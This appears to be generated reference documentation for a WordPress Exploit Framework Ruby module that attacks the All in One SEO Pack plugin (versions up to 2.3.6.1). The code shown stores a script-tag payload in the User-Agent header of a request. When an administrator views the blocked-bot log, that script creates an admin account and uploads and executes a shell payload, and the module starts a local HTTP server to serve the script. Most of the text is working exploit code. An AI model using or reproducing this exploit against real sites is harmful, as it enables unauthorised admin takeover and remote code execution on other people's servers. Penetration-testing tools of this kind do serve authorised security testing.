class Wpxf::Exploit::AllInOneSeoPackXssShellUpload
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::WordPress::Xss::new
# File lib/wpxf/modules/exploit/xss/stored/all_in_one_seo_pack_xss_shell_upload.rb, line 6 def initialize super update_info( name: 'All in One SEO Pack <= 2.3.6.1 Stored XSS Shell Upload', desc: %( This module exploits a lack of HTTP header sanitization in versions <= 2.3.6.1 of the All in One SEO Pack plugin which allows unauthenticated users to store a script that will create a new admin user and use the new credentials to upload and execute a payload when an admin views the blocked bot logs. ).strip, author: [ 'David Vaartjes', # Disclosure 'rastating' # WPXF module ], references: [ ['WPVDB', '8538'], ['URL', 'https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_all_in_one_seo_pack_wordpress_plugin.html'] ], date: 'Jul 10 2016' ) end
Public Instance Methods
blocked_bots()
click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/all_in_one_seo_pack_xss_shell_upload.rb, line 34 def blocked_bots [ 'Abonti', 'aggregator', 'AhrefsBot', 'asterias', 'BDCbot', 'BLEXBot', 'BuiltBotTough', 'Bullseye', 'BunnySlippers', 'ca-crawler', 'CCBot', 'Cegbfeieh', 'CheeseBot', 'CherryPicker', 'CopyRightCheck', 'cosmos', 'Crescent', 'discobot', 'DittoSpyder', 'DotBot', 'Download Ninja', 'EasouSpider', 'EmailCollector', 'EmailSiphon', 'EmailWolf', 'EroCrawler', 'Exabot', 'ExtractorPro', 'Fasterfox', 'FeedBooster', 'Foobot', 'Genieo', 'grub-client', 'Harvest', 'hloader', 'httplib', 'HTTrack', 'humanlinks', 'ieautodiscovery', 'InfoNaviRobot', 'IstellaBot', 'Java/1.', 'JennyBot', 'k2spider', 'Kenjin Spider', 'Keyword Density/0.9', 'larbin', 'LexiBot', 'libWeb', 'libwww', 'LinkextractorPro', 'linko', 'LinkScan/8.1a Unix', 'LinkWalker', 'LNSpiderguy', 'lwp-trivial', 'magpie', 'Mata Hari', 'MaxPointCrawler', 'MegaIndex', 'Microsoft URL Control', 'MIIxpc', 'Mippin', 'Missigua Locator', 'Mister PiX', 'MJ12bot', 'moget', 'MSIECrawler', 'NetAnts', 'NICErsPRO', 'Niki-Bot', 'NPBot', 'Nutch', 'Offline Explorer', 'Openfind', 'panscient.com', 'PHP/5.{', 'ProPowerBot/2.14', 'ProWebWalker', 'Python-urllib', 'QueryN Metasearch', 'RepoMonkey', 'RMA', 'SemrushBot', 'SeznamBot', 'SISTRIX', 'sitecheck.Internetseer.com', 'SiteSnagger', 'SnapPreviewBot', 'Sogou', 'SpankBot', 'spanner', 'spbot', 'Spinn3r', 'suzuran', 'Szukacz/1.4', 'Teleport', 'Telesoft', 'The Intraformant', 'TheNomad', 'TightTwatBot', 'Titan', 'toCrawl/UrlDispatcher', 'True_Robot', 'turingos', 'TurnitinBot', 'UbiCrawler', 'UnisterBot', 'URLy Warning', 'VCI', 'WBSearchBot', 'Web Downloader/6.9', 'Web Image Collector', 'WebAuto', 'WebBandit', 'WebCopier', 'WebEnhancer', 'WebmasterWorldForumBot', 'WebReaper', 'WebSauger', 'Website Quester', 'Webster Pro', 'WebStripper', 'WebZip', 'Wotbox', 'wsr-agent', 'WWW-Collector-E', 'Xenu', 'Zao', 'Zeus', 'ZyBORG', 'coccoc', 'Incutio', 'lmspider', 'memoryBot', 'SemrushBot', 'serf', 'Unknown', 'uptime files' ] end
check()
click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/all_in_one_seo_pack_xss_shell_upload.rb, line 30 def check check_plugin_version_from_readme('all-in-one-seo-pack', '2.3.6.2') end
run()
click to toggle source
Calls superclass method
Wpxf::Module#run
# File lib/wpxf/modules/exploit/xss/stored/all_in_one_seo_pack_xss_shell_upload.rb, line 199 def run return false unless super return false unless store_script emit_success 'Script stored and will be executed when a user views the blocked bots log' start_http_server xss_shell_success end
store_script()
click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/all_in_one_seo_pack_xss_shell_upload.rb, line 178 def store_script emit_info 'Storing script...' res = execute_get_request( url: full_uri, headers: { 'User-Agent' => "#{blocked_bots.sample}<script>#{xss_ascii_encoded_include_script}</script>" } ) if res.nil? emit_error 'No response from the target' return false end if res.code != 503 emit_warning "Server responded with code #{res.code}, expected 503" end true end